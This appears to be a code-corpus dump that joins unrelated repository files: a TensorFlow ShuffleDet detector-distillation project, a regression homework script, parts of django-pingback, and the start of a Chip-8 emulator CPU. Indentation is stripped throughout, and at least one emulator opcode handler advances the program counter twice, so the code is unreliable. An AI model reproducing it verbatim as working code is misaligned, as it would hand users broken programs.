in_shape = x.get_shape().as_list()
in_channel = in_shape[1]
assert out_channel % in_channel == 0
channel_mult = out_channel // in_channel
if W_init is None:
W_init = tf.variance_scaling_initializer(2.0)
kernel_shape = [kernel_shape, kernel_shape]
filter_shape = kernel_shape + [in_channel, channel_mult]
W = tf.get_variable('W', filter_shape, initializer=W_init)
conv = tf.nn.depthwise_conv2d(x, W, [1, 1, stride, stride], padding=padding, data_format='NCHW')
return nl(conv, name='output')
@under_name_scope()
def channel_shuffle(l, group):
in_shape = l.get_shape().as_list()
in_channel = in_shape[1]
l = tf.reshape(l, [-1, group, in_channel // group] + in_shape[-2:])
l = tf.transpose(l, [0, 2, 1, 3, 4])
l = tf.reshape(l, [-1, in_channel] + in_shape[-2:])
return l
def BN(x, name):
return BatchNorm('bn', x)
def RELU(x, name):
return tf.nn.relu(x)
def c_BN(x, name):
return c_batch_norm('bn', x, '')
def c_BNReLU(x, name):
l = c_batch_norm('bn', x, '')
return tf.nn.relu(l)
class ShuffleDet_conv1_stride1(ModelSkeleton):
def __init__(self, mc, gpu_id=0, without_imitation=False):
with tf.device('/gpu:{}'.format(gpu_id)):
ModelSkeleton.__init__(self, mc)
self.without_imitation = without_imitation
def model_fn(self, student=0.5):
self._add_forward_graph(student)
self._add_interpretation_graph()
self._add_loss_graph()
def _add_forward_graph(self, student=0.5):
"""NN architecture."""
self.image_input, self.input_mask, self.box_delta_input, \
self.box_input, self.labels, self.mimic_mask, self.mimic_mask2 = self.batch_data_queue.dequeue()
def shufflenet_unit_supervisor(l, out_channel, group, stride):
in_shape = l.get_shape().as_list()
in_channel = in_shape[1]
shortcut = l
# We do not apply group convolution on the first pointwise layer
# because the number of input channels is relatively small.
first_split = group if in_channel != 16 else 1
l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=BNReLU)
l = channel_shuffle(l, group)
l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=BN, stride=stride)
l = Conv2D('conv2', l,
out_channel if stride == 1 else out_channel - in_channel,
kernel_shape=1, split=first_split, nl=BN)
if stride == 1: # unit (b)
output = tf.nn.relu(shortcut + l)
else: # unit (c)
shortcut = AvgPooling('avgpool', shortcut, 3, 2, padding='SAME')
output = tf.concat([shortcut, tf.nn.relu(l)], axis=1)
return output
def shufflenet_unit_add_supervisor(l, out_channel, group, stride):
in_shape = l.get_shape().as_list()
in_channel = in_shape[1]
shortcut = l
# We do not apply group convolution on the first pointwise layer
# because the number of input channels is relatively small.
first_split = group if in_channel != 24 else 1
l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=BNReLU)
l = channel_shuffle(l, group)
l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=BN, stride=stride)
l = Conv2D('conv2', l,
out_channel,
kernel_shape=1, split=first_split, nl=BN)
output = tf.nn.relu(shortcut + l)
return output
def shufflenet_unit_no_shortcut_supervisor(l, out_channel, group, stride):
in_shape = l.get_shape().as_list()
in_channel = in_shape[1]
# We do not apply group convolution on the first pointwise layer
# because the number of input channels is relatively small.
first_split = group if in_channel != 24 else 1
l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=BNReLU)
l = channel_shuffle(l, group)
l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=BN, stride=stride)
l = Conv2D('conv2', l,
out_channel,
kernel_shape=1, split=first_split, nl=BN)
output = tf.nn.relu(l)
return output
def shufflenet_unit(l, out_channel, group, stride):
in_shape = l.get_shape().as_list()
in_channel = in_shape[1]
shortcut = l
# We do not apply group convolution on the first pointwise layer
# because the number of input channels is relatively small.
first_split = group if in_channel != 24 else 1
l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=c_BNReLU)
l = channel_shuffle(l, group)
l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=c_BN, stride=stride)
l = Conv2D('conv2', l,
out_channel if stride == 1 else out_channel - in_channel,
kernel_shape=1, split=group, nl=c_BN)
if stride == 1: # unit (b)
output = tf.nn.relu(shortcut + l)
else: # unit (c)
shortcut = AvgPooling('avgpool', shortcut, 3, 2, padding='SAME')
output = tf.concat([shortcut, tf.nn.relu(l)], axis=1)
return output
def shufflenet_unit_add(l, out_channel, group, stride):
in_shape = l.get_shape().as_list()
in_channel = in_shape[1]
shortcut = l
# We do not apply group convolution on the first pointwise layer
# because the number of input channels is relatively small.
first_split = group if in_channel != 24 else 1
l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=c_BNReLU)
l = channel_shuffle(l, group)
l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=c_BN, stride=stride)
l = Conv2D('conv2', l,
out_channel,
kernel_shape=1, split=first_split, nl=c_BN)
output = tf.nn.relu(shortcut + l)
return output
def shufflenet_unit_no_shortcut(l, out_channel, group, stride):
in_shape = l.get_shape().as_list()
in_channel = in_shape[1]
# We do not apply group convolution on the first pointwise layer
# because the number of input channels is relatively small.
first_split = group if in_channel != 24 else 1
l = Conv2D('conv1', l, out_channel // 4, kernel_shape=1, split=first_split, nl=c_BNReLU)
l = channel_shuffle(l, group)
l = DepthConv('dconv', l, out_channel // 4, kernel_shape=3, nl=c_BN, stride=stride)
l = Conv2D('conv2', l,
out_channel,
kernel_shape=1, split=first_split, nl=c_BN)
output = tf.nn.relu(l)
return output
mc = self.mc
# if mc.LOAD_PRETRAINED_MODEL:
# assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
# 'Cannot find pretrained model at the given path:' \
# ' {}'.format(mc.PRETRAINED_MODEL_PATH)
with argscope([Conv2D, MaxPooling, AvgPooling, GlobalAvgPooling, BatchNorm], data_format='NCHW'), \
argscope(Conv2D, use_bias=False):
with TowerContext(tf.get_default_graph().get_name_scope(), is_training=False):
with tf.variable_scope('shuffleDet_supervisor'):
group = 3
channels = [240, 480, 960]
l = tf.transpose(self.image_input, [0, 3, 1, 2])
l = Conv2D('conv1', l, 16, 3, stride=1, nl=BNReLU)
l = MaxPooling('pool1', l, 3, 2, padding='SAME')
with tf.variable_scope('group1'):
for i in range(4):
with tf.variable_scope('block{}'.format(i)):
l = shufflenet_unit_supervisor(l, channels[0], group, 2 if i == 0 else 1)
with tf.variable_scope('group2'):
for i in range(6):
with tf.variable_scope('block{}'.format(i)):
l = shufflenet_unit_supervisor(l, channels[1], group, 2 if i == 0 else 1)
with tf.variable_scope('group3'):
for i in range(4):
with tf.variable_scope('block{}'.format(i)):
l = shufflenet_unit_supervisor(l, channels[2], group, 2 if i == 0 else 1)
with tf.variable_scope('added3'):
with tf.variable_scope('block{}'.format(0)):
l = shufflenet_unit_add_supervisor(l, 960, 3, 1)
with tf.variable_scope('block{}'.format(1)):
l = shufflenet_unit_no_shortcut_supervisor(l, 768, 3, 1)
supervisor_last_feature = tf.transpose(l, [0, 2, 3, 1])
self.inspect_last_feature = supervisor_last_feature
with argscope(c_batch_norm, is_main_training_tower=int(tf.get_default_graph().get_name_scope()[-1]) == 0,
data_format='NCHW'):
with TowerContext(tf.get_default_graph().get_name_scope(), is_training=mc.IS_TRAINING, index=
int(tf.get_default_graph().get_name_scope()[-1])):
# with TowerContext(tf.get_default_graph().get_name_scope(), is_training=mc.IS_TRAINING):
group = 3
# channels = [120, 240, 480]
channels = [int(240 * student), int(480 * student), int(960 * student)]
l = tf.transpose(self.image_input, [0, 3, 1, 2])
l = Conv2D('conv1', l, 24, 3, stride=1, nl=c_BNReLU)
l = MaxPooling('pool1', l, 3, 2, padding='SAME')
with tf.variable_scope('group1'):
for i in range(4):
with tf.variable_scope('block{}'.format(i)):
l = shufflenet_unit(l, channels[0], group, 2 if i == 0 else 1)
with tf.variable_scope('group2'):
for i in range(6):
with tf.variable_scope('block{}'.format(i)):
l = shufflenet_unit(l, channels[1], group, 2 if i == 0 else 1)
with tf.variable_scope('group3'):
for i in range(4):
with tf.variable_scope('block{}'.format(i)):
l = shufflenet_unit(l, channels[2], group, 2 if i == 0 else 1)
with tf.variable_scope('added3'):
with tf.variable_scope('block{}'.format(0)):
l = shufflenet_unit_add(l, int(960 * student), 3, 1)
with tf.variable_scope('block{}'.format(1)):
l = shufflenet_unit_no_shortcut(l, int(768 * student), 3, 1) # 768, 384, 192
l = tf.transpose(l, [0, 2, 3, 1])
with tf.variable_scope('adaptation'):
student_adap = self._conv_layer_no_pretrain(
'conv', l, filters=768, size=3, stride=1,
padding='SAME', xavier=False, relu=True, stddev=0.0001)
# student_adap = Conv2D('conv', l, 768, 3, data_format='channels_last',nl=RELU)
###add for mimic
with tf.variable_scope('mimic_loss'):
mimic_mask = tf.cast(tf.expand_dims(self.mimic_mask, axis=-1), tf.float32)
# this normalization is maybe too harsh
# mask mimic
if student == 0.5:
normalization = tf.reduce_sum(mimic_mask) * 2.
else:
normalization = tf.reduce_sum(mimic_mask) * 4.
self.mimic_loss = tf.div(tf.reduce_sum(tf.square(
supervisor_last_feature - student_adap) *
mimic_mask), normalization)
if self.without_imitation:
self.mimic_loss = self.mimic_loss * 0.
tf.add_to_collection('losses', self.mimic_loss)
dropout11 = tf.nn.dropout(l, self.keep_prob, name='drop11')
num_output = mc.ANCHOR_PER_GRID * (mc.CLASSES + 1 + 4)
self.preds = self._conv_layer_no_pretrain(
'conv12', dropout11, filters=num_output, size=3, stride=1,
padding='SAME', xavier=False, relu=False, stddev=0.0001)
# self.preds = Conv2D('conv12', dropout11, num_output, 3, data_format='channels_last', nl=None)
|
twangnh/Distilling-Object-Detectors-Shuffledet | dataset_tool/augmentation.py |
import random
import numpy as np
import cv2
def BrightnessTransform(data, delta_max = 50):
"""
Transform brightness
Parameters: delta
"""
data = data.astype(np.float32)
delta = random.randint(-delta_max, delta_max)
data += delta
data[data>255] = 255
data[data<0] = 0
data = data.astype(np.uint8)
return data
def ContrastTransform(data, lower=0.5, upper=1.5):
"""
Transform contrast
Parameters: lower, upper
"""
data = data.astype(np.float32)
delta = random.uniform(lower, upper)
data *= delta
data[data>255] = 255
data[data<0] = 0
data = data.astype(np.uint8)
return data
def SaturationTransform(data, lower=0.3, upper=1.7):
"""
Transform hue
Parameters: lower, upper
"""
data = cv2.cvtColor(data, cv2.COLOR_BGR2HSV)
data = data.astype(np.float32)
delta = random.uniform(lower, upper)
data[1] *= delta
data[1][data[1]>255] = 255
data[1][data[1]<0] = 0
data = data.astype(np.uint8)
data = cv2.cvtColor(data, cv2.COLOR_HSV2BGR)
return data |
twangnh/Distilling-Object-Detectors-Shuffledet | train_multi_gpu.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import os.path
from six.moves import xrange
import tensorflow as tf
from lib.config import *
from dataset_tool import kitti
from lib.utils.util import bbox_transform
from lib.models.shuffleDet_sup import ShuffleDet_conv1_stride1
from lib.utils import model_deploy
import tensorflow.contrib.slim as slim
import datetime
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('year', '2007',
"""VOC challenge year. 2007 or 2012"""
"""Only used for Pascal VOC dataset""")
tf.app.flags.DEFINE_string('train_dir', '/tmp/logs/train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 10000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'ShuffleDet_conv1_stride1',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 50,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('print_step', 20,
"""Number of steps to print.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 500,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_float('student', 0.5, """student model, 0.5 or 0.25""")
tf.app.flags.DEFINE_bool('without_imitation', False, """whether to turn off imitation loss""")
def train():
assert FLAGS.dataset == 'KITTI', \
'Currently only support KITTI dataset'
mc = kitti_shuffledet_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = ShuffleDet_conv1_stride1(mc, without_imitation=FLAGS.without_imitation)
with tf.Graph().as_default():
config = model_deploy.DeploymentConfig(num_clones=4)
with tf.device(config.inputs_device()):
mc.BATCH_SIZE = 1
imdb = kitti('train', './data/KITTI', mc)
model.add_input_graph(imdb.next_batch)
mc.BATCH_SIZE = 8
with tf.device(config.variables_device()):
global_step = slim.create_global_step()
with tf.device(config.optimizer_device()):
lr = tf.train.cosine_decay(0.02,
global_step,
40000,
0.0000001)
optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9)
tf.summary.scalar('learning_rate', lr)
def freeze_variable_func():
freeze_vars = tf.global_variables(scope='shuffleDet_supervisor')
# exclude_vars = tf.global_variables(scope='sqDet')
all_trainable_vars = tf.trainable_variables()
train_vars = [item for item in all_trainable_vars if item not in freeze_vars]
return train_vars
model_dp = model_deploy.deploy(config, model.model_fn,
args=[FLAGS.student],
optimizer=optimizer, freeze_variable_func=freeze_variable_func)
## code a bit ugly here, will improve future.
## to separate the varibles that are initalized from pretrained model and the variables that needs to be randomly intialized
full = tf.global_variables()
g = tf.global_variables(scope='g')
global_step = tf.global_variables(scope='global')
g = [item for item in g if item not in global_step]
c = tf.global_variables(scope='conv1')
conv12 = tf.global_variables(scope='conv12')
c = [item for item in c if item not in conv12]
list = g + c
momentum_list = []
for item in list:
if 'Mom' in item.op.name:
momentum_list.append(item)
list = [item for item in list if item not in momentum_list]
list_to_be_initialized = [item for item in full if item not in list]
init_saver = tf.train.Saver(var_list=list)
saver = tf.train.Saver()
def init_fn(sess):
init_saver.restore(sess, FLAGS.pretrained_model_path)
init = tf.variables_initializer(var_list=list_to_be_initialized)
sess.run(init)
tf.train.start_queue_runners(sess=sess)
sess = tf.Session()
init_fn(sess)
## restore supervisor
vars_shuffleDet_supervisor = tf.global_variables(scope='shuffleDet_supervisor')
vars_shuffleDet_supervisor_replace = {var.op.name.replace('shuffleDet_supervisor/', ''): var for var in vars_shuffleDet_supervisor}
saver_superviser = tf.train.Saver(var_list=vars_shuffleDet_supervisor_replace)
saver_superviser.restore(sess, './kitti-1x-supervisor/model.ckpt-725000')
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
for step in xrange(FLAGS.max_steps):
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_step == 0 or (step + 1) == FLAGS.max_steps:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
if step % FLAGS.summary_step == 0:
op_list = [
model_dp.train_op, summary_op
]
loss, summary_str = sess.run(op_list)
summary_writer.add_summary(summary_str, step)
summary_writer.flush()
else:
loss = sess.run(model_dp.train_op)
if step%FLAGS.print_step ==0:
print('step: {} total_loss: {} time: {}'.format(step, loss, datetime.datetime.now()))
def main(argv=None):
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
|
twangnh/Distilling-Object-Detectors-Shuffledet | param_count.py | <gh_stars>10-100
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import tensorflow as tf
import numpy as np
parser = argparse.ArgumentParser(description='count parameters')
parser.add_argument('--model_path', dest='model_path',
help='model_path for counting parameters', default="",
type=str)
args = parser.parse_args()
ckpt_fpath =args.model_path
reader = tf.train.NewCheckpointReader(ckpt_fpath)
print('\nCount the number of parameters in ckpt file(%s)' % ckpt_fpath)
param_map = reader.get_variable_to_shape_map()
total_count = 0
sortednames=sorted(param_map.keys(), key=lambda x:x.lower())
for k in sortednames:
if 'Momentum' not in k and 'global_step' not in k \
and 'iou' not in k and 'adaptation' not in k :
temp = np.prod(param_map[k])
total_count += temp
print('%s: %s => %d' % (k, str(param_map[k]), temp))
print('Total Param Count: %d' % total_count)
mem = total_count*4/1024/1024
print('total memory: %4f MB' % mem) |
twangnh/Distilling-Object-Detectors-Shuffledet | lib/config/kitti_shuffledet_config.py | <filename>lib/config/kitti_shuffledet_config.py
import numpy as np
from config import base_model_config
def kitti_shuffledet_config():
"""Specify the parameters to tune below."""
mc = base_model_config('KITTI')
mc.IMAGE_WIDTH = 1248
mc.IMAGE_HEIGHT = 384
# mc.IMAGE_WIDTH = 560
# mc.IMAGE_HEIGHT = 180
mc.BATCH_SIZE = 8
mc.WEIGHT_DECAY = 0.0005
mc.LEARNING_RATE = 0.01
mc.DECAY_STEPS = 10000
mc.MAX_GRAD_NORM = 1.0
mc.MOMENTUM = 0.9
mc.LR_DECAY_FACTOR = 0.5
mc.LOSS_COEF_BBOX = 5.0
mc.LOSS_COEF_CONF_POS = 75.0
mc.LOSS_COEF_CONF_NEG = 100.0
mc.LOSS_COEF_CLASS = 1.0
mc.PLOT_PROB_THRESH = 0.4
mc.NMS_THRESH = 0.4
mc.PROB_THRESH = 0.005
mc.TOP_N_DETECTION = 64
mc.DATA_AUGMENTATION = True
# mc.DRIFT_X = 150/(1248./560)
# mc.DRIFT_Y = 100/(384./180)
mc.DRIFT_X = 150
mc.DRIFT_Y = 100
mc.EXCLUDE_HARD_EXAMPLES = False
mc.ANCHOR_BOX = set_anchors(mc)
mc.ANCHORS = len(mc.ANCHOR_BOX)
mc.ANCHOR_PER_GRID = 9
return mc
def set_anchors(mc):
H, W, B = mc.IMAGE_HEIGHT // 16, mc.IMAGE_WIDTH // 16, 9
#H, W, B = 12, 35, 9
#original anchors
anchor_shape_base = np.array(
[[ 36., 37.], [ 366., 174.], [ 115., 59.],
[ 162., 87.], [ 38., 90.], [ 258., 173.],
[ 224., 108.], [ 78., 170.], [ 72., 43.]])
# randomly modified anchors
# anchor_shape_base = np.array(
# [[ 50., 50.], [ 320., 180.], [ 90., 48.],
# [ 180., 100.], [ 50., 120.], [ 200., 130.],
# [ 180., 80.], [ 90., 190.], [ 100., 60.]])
# anchor_shape_base = np.array(
# [[20.63007745, 45.40804647],
# [69.9036478, 153.81476415],
# [135.64310606, 213.72166667],
# [39.594868, 86.59731785],
# [209.20414977, 127.49268851],
# [75.59330804, 47.45570814],
# [337.28631668, 174.02375953],
# [130.50749455, 72.92875091],
# [38.78412702, 28.50398895]])
anchor_shapes = np.reshape(
[anchor_shape_base] * H * W,
(H, W, B, 2)
)
center_x = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, W+1)*float(mc.IMAGE_WIDTH)/(W+1)]*H*B),
(B, H, W)
),
(1, 2, 0)
),
(H, W, B, 1)
)
center_y = np.reshape(
np.transpose(
np.reshape(
np.array([np.arange(1, H+1)*float(mc.IMAGE_HEIGHT)/(H+1)]*W*B),
(B, W, H)
),
(2, 1, 0)
),
(H, W, B, 1)
)
anchors = np.reshape(
np.concatenate((center_x, center_y, anchor_shapes), axis=3),
(-1, 4)
)
return anchors
|
haojunsui/PSU-MATH-450-Mathematical-Modeling | Code/problem_1.py | <gh_stars>0
import numpy as np
from numpy.linalg import inv
import matplotlib.pyplot as plt
x = np.matrix([74.4, 93.4, 110.4, 130.6, 148.9, 170.7, 191.1, 211.8, 231.7, 259.1]).transpose()
y = np.matrix([1.64, 2.03, 3.16, 3.96, 4.78, 6.21, 7.28, 8.91, 8.79, 8.63]).transpose()
x_log10 = np.log10(x)
A = np.concatenate((np.matrix(np.ones(x.shape[0])).transpose(), x_log10), axis=1)
b = np.log10(y)
betas = inv(A.transpose() * A) * A.transpose() * b
y_log_fit = A * betas
plt.figure(figsize=(10,8))
plt.plot(np.array(x_log10), np.array(b), "ro", markersize=8)
plt.plot(np.array(x_log10), np.array(y_log_fit), "b", linewidth=2)
plt.xlabel("$\log_{10}x$ (kg)", fontsize=24)
plt.ylabel("$\log_{10}y$ (kg)", fontsize=24)
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
plt.legend(["Data", "Best fit, $\log_{10}y = %.3f + %.3f\log_{10}x$" % (betas.item((0, 0)), betas.item((1, 0)))], loc="upper left", fontsize=20)
plt.savefig("problem_1_log_fit.eps", format="eps", dpi=1000)
plt.show()
print betas.item((1, 0))
y_fit = np.power(10, betas.item((0, 0))) * np.power(x, betas.item((1, 0)))
plt.figure(figsize=(10,8))
plt.plot(np.array(x), np.array(y), "ro", markersize=8)
plt.plot(np.array(x), np.array(y_fit), "b", linewidth=2)
plt.xlabel("$x$ (kg)", fontsize=24)
plt.ylabel("$y$ (kg)", fontsize=24)
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
plt.legend(["Data", "Best fit, $y = %.3f * x ^ {%.3f}$" % (np.power(10, betas.item((0, 0))), betas.item((1, 0)))], loc="upper left", fontsize=20)
plt.savefig("problem_1_fit.eps", format="eps", dpi=1000)
plt.show()
|
tualatrix/django-pingback | pingback/admin.py | from django.contrib import admin
from pingback.models import Pingback, PingbackClient, DirectoryPing
class PingbackAdmin(admin.ModelAdmin):
list_display = ('url', 'admin_object', 'date', 'approved', 'title')
admin.site.register(Pingback, PingbackAdmin)
class PingbackClientAdmin(admin.ModelAdmin):
list_display = ('admin_object', 'url', 'date', 'success')
admin.site.register(PingbackClient, PingbackClientAdmin)
class DirectoryPingAdmin(admin.ModelAdmin):
list_display = ('url', 'date', 'success')
admin.site.register(DirectoryPing, DirectoryPingAdmin)
|
tualatrix/django-pingback | setup.py | <gh_stars>1-10
from setuptools import setup, find_packages
setup(
name = 'django-pingback',
version = '0.1.3',
description = 'Pingback client and server for Django web framework, extracted from Byteflow blog engine.',
keywords = 'django apps',
license = 'New BSD License',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'http://hg.piranha.org.ua/django-pingback/',
install_requires = ['django-xmlrpc>=0.1.0'],
dependency_links = ['http://pypi.aartemenko.com'],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Plugins',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages = find_packages(),
include_package_data = True,
)
|
tualatrix/django-pingback | pingback/templatetags/pingback_tags.py | <filename>pingback/templatetags/pingback_tags.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2008 by <NAME> <<EMAIL>>
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.template import Library, Node, TemplateSyntaxError, Variable
from pingback.models import Pingback
register = Library()
class FillContextForObjectParser(object):
def __call__(self, parser, token):
tokens = token.split_contents()
if len(tokens) != 5:
raise TemplateSyntaxError, "%r tag requires 4 arguments" % tokens[0]
if tokens[1] != 'for':
raise TemplateSyntaxError, "First argument in %r tag must be 'for'" % tokens[0]
if tokens[3] != 'as':
raise TemplateSyntaxError, "Third argument in %r tag must be 'as'" % tokens[0]
object_variable = tokens[2]
context_variable = tokens[4]
return self.do_tag(object_variable, context_variable)
class PingbackBaseNode(Node):
def __init__(self, object_variable, context_variable):
self.context_variable = context_variable
self.object_variable = Variable(object_variable)
class PingbackListNode(PingbackBaseNode):
def render(self, context):
obj = self.object_variable.resolve(context)
context[self.context_variable] = Pingback.objects.pingbacks_for_object(obj)
return ''
class DoPingbackList(FillContextForObjectParser):
"""
Gets list of Pingback objects for then given parameter and populates
the context with a variable containing that list. The variable's
name is defined by the `as` clause of the tag.
Syntax::
{% get_pingback_list for [context_var_containing_obj] as [varname] %}
Example usage::
{% get_pingback_list for object as pingback_list %}
"""
def do_tag(self, object_variable, context_variable):
return PingbackListNode(object_variable, context_variable)
class PingbackCountNode(PingbackBaseNode):
def render(self, context):
obj = self.object_variable.resolve(context)
context[self.context_variable] = Pingback.objects.count_for_object(obj)
return ''
class DoPingbackCount(FillContextForObjectParser):
"""
Gets pingback count for the given params and populates the template
context with a variable containing that value. The variable's name
is defined by the `as` clause of the tag.
Syntax::
{% get_pingback_count for [context_var_containing_obj] as [varname] %}
Example usage::
{% get_pingback_count for object as pingback_count %}
"""
def do_tag(self, object_variable, context_variable):
return PingbackCountNode(object_variable, context_variable)
register.tag("get_pingback_count", DoPingbackCount())
register.tag("get_pingback_list", DoPingbackList())
|
Maxic/Chip-8 | cpu.py | import logging
import random
import numpy as N
class Cpu:
def __init__(self):
# memory 4kbs
self.memory = [0] * 4096
# data registers (8-bit)
self.V = [0] * 16
# address register (16-bit)
self.I = 0
# timers (8-bit)
self.delay = 0
self.sound = 0
# program counter, 0x000 to 0x1FF is reserved for internal use (16-bit)
self.pc = 0x200
# stack pointer (8-bit) and stack (16-bit)
self.stack_pointer = 0
self.stack = [0] * 16
# Initialize graphics array
self.graphics = N.zeros((31, 63))
# initialize some sprites in memory
self.sprite_pointer = 0x50
self.sprites = [
0xF0, 0x90, 0x90, 0x90, 0xF0, # Zero
0x20, 0x60, 0x20, 0x20, 0x70, # One
0xF0, 0x10, 0xF0, 0x80, 0xF0, # Two
0xF0, 0x10, 0xF0, 0x10, 0xF0, # Three
0x90, 0x90, 0xF0, 0x10, 0x10, # Four
0xF0, 0x80, 0xF0, 0x10, 0xF0, # Five
0xF0, 0x80, 0xF0, 0x90, 0xF0, # Six
0xF0, 0x10, 0x20, 0x40, 0x40, # Seven
0xF0, 0x90, 0xF0, 0x90, 0xF0, # Eight
0xF0, 0x90, 0xF0, 0x10, 0xF0, # Nine
0xF0, 0x90, 0xF0, 0x90, 0x90, # A
0xE0, 0x90, 0xE0, 0x90, 0xE0, # B
0xF0, 0x80, 0x80, 0x80, 0xF0, # C
0xE0, 0x90, 0x90, 0x90, 0xE0, # D
0xF0, 0x80, 0xF0, 0x80, 0xF0, # E
0xF0, 0x80, 0xF0, 0x80, 0x80 # F
]
# Sprites are saved in memory starting at 0x50
for i in range(len(self.sprites)):
self.memory[self.sprite_pointer+i] = self.sprites[i]
self.keys = list(range(16))
logging.basicConfig(level=logging.DEBUG)
# fetch an opcode from two bytes
def fetch_opcode(self, hexvalue):
byte1 = self.memory[hexvalue]
byte2 = self.memory[hexvalue+1]
opcode = byte1 << 8
opcode = opcode | byte2
return opcode
def execute_operation(self, opcode, key):
opcode_identifier = opcode & 0xF000
nnn = opcode & 0xFFF
kk = opcode & 0x00FF
x = (opcode & 0x0F00) >> 8
y = (opcode & 0x00F0) >> 4
# Debug logging
logging.debug("Register I: " + hex(self.I))
logging.debug("Program Counter: " + hex(self.pc))
for i in range(0x10):
logging.debug("Register V[" + hex(i) + "]: " + hex(self.V[i]))
logging.debug('\n' + '\n'.join([''.join(['{:2}'.format(int(item)) for item in row])
for row in self.graphics]))
# 0XXX - Multiple opcodes
if opcode_identifier == 0x0000:
# 00E0 - CLS - Clear the display.
if opcode == 0x00E0:
logging.debug(hex(opcode) + " == 00E0 - CLS - Clear the display")
self.graphics = N.zeros((31, 63))
self.pc += 2
# 00EE - RET - Return from a subroutine.
elif opcode == 0x00EE:
logging.debug(hex(opcode) + " == 00EE - RET - Return from a subroutine")
self.pc = self.stack[self.stack_pointer] + 2
self.stack_pointer -= 1
else:
raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
# 1nnn - JP addr - Jump to location nnn.
elif opcode_identifier == 0x1000:
logging.debug(hex(opcode) + " == 1nnn - JP addr - Jump to location nnn")
self.pc = nnn
# 2nnn - CALL addr - Call subroutine at nnn.
elif opcode_identifier == 0x2000:
logging.debug(hex(opcode) + " == 2nnn - CALL addr - Call subroutine at nnn")
self.stack_pointer += 1
self.stack[self.stack_pointer] = self.pc
self.pc = nnn
# 3xkk - SE Vx, byte - Skip next instruction if Vx = kk.
elif opcode_identifier == 0x3000:
logging.debug(hex(opcode) + " == 3xkk - SE Vx, byte - Skip next instruction if Vx = kk")
if self.V[x] == kk:
self.pc += 4
else:
self.pc += 2
# 4xkk - SNE Vx, byte - Skip next instruction if Vx != kk.
elif opcode_identifier == 0x4000:
logging.debug(hex(opcode) + " == 4xkk - SNE Vx, byte - Skip next instruction if Vx != kk")
if self.V[x] != kk:
self.pc += 4
else:
self.pc += 2
# 5xy0 - SE Vx, Vy - Skip next instruction if Vx = Vy.
elif (opcode_identifier == 0x5000) and (opcode & 0xF == 0x0):
logging.debug(hex(opcode) + " == 5xy0 - SE Vx, Vy - Skip next instruction if Vx = Vy")
if self.V[x] == self.V[y]:
self.pc += 4
else:
self.pc += 2
self.pc += 2
# 6xkk - LD Vx, byte - Set Vx = kk.
elif opcode_identifier == 0x6000:
logging.debug(hex(opcode) + " == 6xkk - LD Vx, byte - Set Vx = kk")
self.V[x] = kk
self.pc += 2
# 7xkk - ADD Vx, byte - Set Vx = Vx + kk.
elif opcode_identifier == 0x7000:
logging.debug(hex(opcode) + " == 7xkk - ADD Vx, byte - Set Vx = Vx + kk")
self.V[x] = self.V[x] + kk
self.pc += 2
# 8XXX - Multiple opcodes
elif opcode_identifier == 0x8000:
# 8xy0 - LD Vx, Vy - Set Vx = Vy.
if opcode & 0xF == 0x0:
logging.debug(hex(opcode) + " == 8xy0 - LD Vx, Vy - Set Vx = Vy")
self.V[x] = self.V[y]
self.pc += 2
# 8xy1 - OR Vx, Vy - Set Vx = Vx OR Vy.
elif opcode & 0xF == 0x1:
logging.debug(hex(opcode) + " == 8xy1 - OR Vx, Vy - Set Vx = Vx OR Vy")
self.V[x] = self.V[x] | self.V[y]
self.pc += 2
# 8xy2 - AND Vx, Vy - Set Vx = Vx AND Vy.
elif opcode & 0xF == 0x2:
logging.debug(hex(opcode) + " == 8xy2 - AND Vx, Vy - Set Vx = Vx AND Vy")
self.V[x] = self.V[x] & self.V[y]
self.pc += 2
